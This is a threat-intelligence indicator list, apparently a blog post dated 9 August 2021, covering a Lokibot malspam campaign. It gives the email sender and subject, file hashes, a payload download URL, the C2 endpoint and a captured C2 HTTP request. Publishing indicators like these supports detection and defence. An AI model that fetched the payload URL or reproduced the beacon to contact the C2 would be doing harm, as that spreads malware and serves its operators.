ExecuteMalware

2021-08-09 Lokibot IOCs

Aug 9th, 2021
THREAT IDENTIFICATION: LOKIBOT

SUBJECTS OBSERVED
purchase order 090821

SENDERS OBSERVED
exports@zwpcompany.com

MALDOC FILE HASHES
purchase order 090821.xlsx
97f66886c8ed99dff7103f9057076693

LOKIBOT PAYLOAD URLS
http://klipotrim.com/cjnewa/cjuyro.exe

LOKIBOT PAYLOAD FILE HASHES
97071E.exe
09a33d0fb401a5ab4a5250a799a6689f

UNKNOWN FILE HASH
97071E.hdb
fb527ebc3cd84eb70acb6d6d1ddcc819

LOKIBOT C2
http://arkt.xyz/mrtker4/w2/fre.php

C2 PACKET CONTENTS
POST /mrtker4/w2/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: arkt.xyz
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A1795E60
Content-Length: 3443
Connection: close

HTTP/1.1 404 Not Found
Date: Mon, 09 Aug 2021 16:30:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H17TLh4lp8XYZKhy8z2n4Pt9JIY1xoklPWc0GGO21wgL07%2FkumjZh899YK5p%2B67jj5U56uX21OyW8OqqXycebjjvSTcYVbr6SDt6CVtq31HSkxbn0pVZ1CeJBw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 67c25ed7dadfe6bc-EWR
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

File not found.